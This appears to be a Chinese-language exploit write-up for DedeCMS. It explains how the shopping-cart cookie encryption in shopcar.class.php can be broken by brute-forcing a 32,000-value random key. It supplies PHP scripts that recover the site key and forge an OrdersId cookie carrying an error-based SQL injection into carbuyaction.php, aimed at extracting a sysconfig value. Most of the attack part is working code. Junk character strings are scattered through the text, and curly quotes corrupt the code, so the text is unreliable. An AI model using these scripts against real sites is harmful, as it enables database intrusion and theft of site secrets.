织梦CMS漏洞dedecms漏洞SQL注入漏洞

admin

www.xxx.com/plus/search.php?keyword=
在 include/shopcar.class.php中
" T7 W. ~' X! B+ f& [9 g  b/ I# i* ~; f先看一下这个shopcar类是如何生成cookie的
1 L  S' G, J2 m8 b  }9 w/ i! h" G239      function saveCookie($key,$value)
, u& H. B0 \" b7 \$ y: q240      {
4 }* C5 S6 f$ [2 I0 |9 |241          if(is_array($value))
242          {
; H' Y3 \! Q$ B  r243              $value = $this->enCrypt($this->enCode($value));
. Q1 \! W; c% }4 S* ?244          }
245          else
246          {
5 @4 r4 s- w2 H0 v247              $value = $this->enCrypt($value);
248          }
$ |+ |: _% m5 l249          setcookie($key,$value,time()+36000,’/');
250      }
简单的说，$key就是cookie的key，value就是value，enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型，关键是enCrypt函数
186      function enCrypt($txt)
# x. V! ]0 u3 Z7 Y% z: p6 a6 N0 h" s187      {
2 T0 i+ |% w7 }# d7 d188          srand((double)microtime() * 1000000);
. _- q' n6 K% k7 l( k189          $encrypt_key = md5(rand(0, 32000));
) f' q" f/ H; @5 S3 _' H8 B7 F190          $ctr = 0;
191          $tmp = ”;
192          for($i = 0; $i < strlen($txt); $i++)
193          {
3 A: R( N% y/ |% R; x; N194              $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
# ~" y4 k8 F' R2 Z195              $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
) h- b6 O2 Y  \2 h* o; }/ Q196          }
$ @$ E, T" b5 m  I- n! y$ L197          return base64_encode($this->setKey($tmp));
198      }
: @/ c4 S4 p4 \213      function setKey($txt)
0 u. v  \$ `& @+ t$ }214      {
) z5 i) Y2 x+ n: p6 T3 C215          global $cfg_cookie_encode;
216          $encrypt_key = md5(strtolower($cfg_cookie_encode));
217          $ctr = 0;
218          $tmp = ”;
219          for($i = 0; $i < strlen($txt); $i++)
220          {
221              $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
4 z+ P: J- T4 N3 E222              $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
223          }
224          return $tmp;
225      }
5 ^  O4 ?6 x. t1 d6 A' q  [enCrypt的参数$txt 我们是可知的，返回值就是cookie的值，这个我们也是可知的
然后到了enCrypt调用 setKey时的参数$tmp，这个参数在某种意义上，我们也是可知的，因为$encrypt_key = md5(rand(0, 32000));只有32000种可能，我们可以推出32000种可能的$tmp，从而推出32000种可能的md5(strtolower($cfg_cookie_encode))，对了，忘记说了，我们的目的是推测出setKey中$encrypt_key的值，然后才能任意构造出购物车的cookie，从推出的32000种md5(strtolower($cfg_cookie_encode))，简单过滤掉非字母数字的key，就只剩下几百个可能的key，然后我们再从新下一次订单，然后再获取几百个可能的key，然后取交集，得到最终key。
具体代码如下：
<?php
$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here
5 N2 h8 K1 w- X$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
0 _7 E" j3 I9 Y$ r  ~4 k9 r6 y& a$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
function reStrCode($code,$string)
{
$code = base64_decode($code);
% `" r3 M) X$ h6 Y' X1 H; I* v$key = “”;
for($i=0 ; $i<32 ; $i++)
{
9 f# x) ]  Q3 L) t, I1 w) z$ m$key .= $string[$i] ^ $code[$i];
7 V0 H! ^: a+ T5 r( l' V" m}
- x% A) ^1 P1 a2 l/ I' K! Greturn $key;
}
function getKeys($cookie,$plantxt)
{
- x; e7 K0 T" {$tmp = $cookie;
- ^( f4 {& N4 H$ E/ H+ k) e- s- p$results = array();
for($j=0 ; $j < 32000; $j++)
{

$txt = $plantxt;
$ctr = 0;
$tmp = ”;
$encrypt_key = md5($j);
for($i =0; $i < strlen($txt); $i ++)
{
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
1 k8 p0 s6 o) [0 A5 G* [# o, \$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
}
$string = $tmp;
1 E6 C9 P$ ~$ J/ _& s+ `, N  g$code = $cookie;
$result = reStrCode($code,$string);
$ p. F& t* W: Uif(eregi(‘^[a-z0-9]+$’,$result))
{
echo $result.”\n”;
$results[] = $result;
& p% c6 T9 f: G$ w) o- d# w}
  M# C8 i5 W' A2 ^  E! w3 u$ y}
return $results;
  @6 y; [# n' s' D% U: k5 A}
; v0 @6 j5 P+ n+ @$results1 = getKeys($cookie1,$plantxt);
* e( A/ b! R1 O$results2 = getKeys($cookie2,$plantxt);
print “\n——————–real key————————–\n”;
. T& Y; F% W8 P- Pforeach($results1 as $test1)
+ v' i$ N) T* d" x: M) R{
" H+ J- ~" C. H0 j. T$ v: [foreach($results2 as $test2)
{
: Y9 T' L" j( k0 Xif($test1 == $test2)
+ Y' z" h0 g1 M+ R6 U+ u5 `{
  S$ m5 g) D# K$ m+ Q9 q% S5 w" c. becho $test1.”\n”;
0 h" b9 ^  q' l% P' I( w9 ]}
/ b" F9 f6 X* F- S- c2 {, z* e. o* {}
! r& R, ~2 C, D1 R9 r1 k5 ]8 O+ t}
?>
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie，
plantxt可以根据页面来自己推算，大概就是这个格式：id=2&price=0&units=fun&buynum=1&title=naduohua1
* U4 }2 j( o* J% Y: Q# s然后推算出md5(strtolower($cfg_cookie_encode))
' G  I/ W6 {0 G& V/ N得到这个key之后，我们就可以构造任意购物车的cookie
接着看
1 K4 F3 {# x4 j) g( m$ H6 O: M5 q# d20  class MemberShops
/ e- r7 V" I9 I/ |# \6 V21  {
/ j# T" e2 j1 T22      var $OrdersId;
23      var $productsId;
24
25      function __construct()
26      {
27          $this->OrdersId = $this->getCookie(“OrdersId”);
28          if(empty($this->OrdersId))
9 W6 y, K& Z1 g" p2 ~2 i29          {
30              $this->OrdersId = $this->MakeOrders();
31          }
32      }
发现OrderId是从cookie里面获取的
然后
- u4 V9 R8 N1 L- y6 B. q& W/plus/carbuyaction.php中的
# k2 g. U$ w, d0 X7 }0 l- J! k  K: G29      $cart    = new MemberShops();
39      $OrdersId = $cart->OrdersId;        //本次记录的订单号
- g( X& O0 o9 Y: Y0 g7 V……
1 k$ k. X2 V- E  D8 T( b" f0 Y173          $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
5 B- S' P0 b0 n$ R: O接着我们就可以注入了
通过利用下面代码生成cookie：
4 w% T, @7 R( w<?php
" h% Z9 y; {, H  C$ l) c* Q$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
1 Q5 j6 y2 I$ V0 L0 E7 ?$encrypt_key = “9f09293b7419ed68448fb51d5b174834″;   // here is the key, please change here
$ Q: F+ B) p5 W1 t' \0 |9 y' Vfunction setKey($txt)
2 t# f- l% e7 l3 r4 _5 S0 q{
global $encrypt_key;
2 q- t3 ~5 A% [) m( Q( W$ctr = 0;
" v3 Y: ]0 \, X9 X7 l/ _$tmp = ”;
for($i = 0; $i < strlen($txt); $i++)
{
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
) w) }% ]) Q5 `3 d$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
}
4 j1 [. d! y+ W; Sreturn $tmp;
}
function enCrypt($txt)
{
2 x* V0 f" E/ h+ l& ]- i% b" Ysrand((double)microtime() * 1000000);
' C8 J6 z+ C' X. l' j9 ~$encrypt_key = md5(rand(0, 32000));
3 h3 o) c: E9 f0 R) R) ?  O5 P- }$ctr = 0;
$tmp = ”;
for($i = 0; $i < strlen($txt); $i++)
{
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
( U5 }  d( Q7 _! z- |$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
}
* l7 w' Y4 L$ l' Ureturn base64_encode(setKey($tmp));
}
for($dest =0;$dest = enCrypt($txt);)
{
9 y; I1 @& G, x/ H7 [if(!strpos($dest,’+'))
{
( N) D5 y0 n% q& jbreak;
}
; Q* q) k5 F4 F+ G$ T; P9 o}
  \  B$ [( p2 ~+ D4 mecho $dest.”\n”;
?>

​